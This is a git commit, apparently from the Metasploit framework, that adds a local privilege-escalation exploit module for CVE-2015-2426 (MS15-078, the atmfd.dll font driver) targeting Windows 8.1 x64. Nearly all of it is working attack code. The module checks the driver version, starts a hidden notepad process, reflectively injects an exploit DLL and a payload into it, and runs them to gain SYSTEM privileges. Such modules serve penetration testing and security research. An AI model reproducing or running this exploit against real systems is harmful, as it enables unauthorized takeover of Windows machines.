Add exploit template

2015-09-02 17:28:35 -05:00 · 2015-09-02 17:28:35 -05:00 · b912e3ce65
parent 4090c2c8ea
commit b912e3ce65
2 changed files with 130 additions and 0 deletions
--- a/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
+++ b/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'            => 'Windows ...',
+      'Description'     => %q{
+        This module ...
+        This module has been tested on vulnerable builds of Windows 8.1 x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+          'Eugene Ching',    # vulnerability discovery and exploit
+          'Mateusz Jurczyk', # vulnerability discovery
+          'Cedric Halbronn', # vulnerability and exploit analysis
+          'juan vazquez'     # msf module
+        ],
+      'Arch'            => ARCH_X86_64,
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'meterpreter' ],
+      'DefaultOptions'  => {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         => [
+          [ 'Windows 8.1 x64',  { } ]
+        ],
+      'Payload'         => {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'      => [
+          ['CVE', '2015-2426'],
+          ['MSB', 'MS15-078'],
+          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
+          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
+          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369']
+        ],
+      'DisclosureDate'  => 'Sep 02 2015',
+      'DefaultTarget'   => 0
+    }))
+  end
+
+  def check
+    # Windows 8.1 (64-bit) / atmfd 5.1.2.238 (Works)
+
+    # I have only tested Windows 8
+    if sysinfo['OS'] !~ /Windows 8/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    # I have only tested 64 bits versions
+    if sysinfo['Architecture'] !~ /(wow|x)64/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
+    major, minor, build, revision, branch = file_version(file_path)
+    ver = "#{major}.#{minor}.#{build}.#{revision}"
+    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
+
+    return Exploit::CheckCode::Appears if Gem::Version.new(ver) == Gem::Version.new('5.1.2.238')
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    check_result = check
+    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+=begin
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+=end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Sandboxes could not allow to create a new process
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  end
+
+end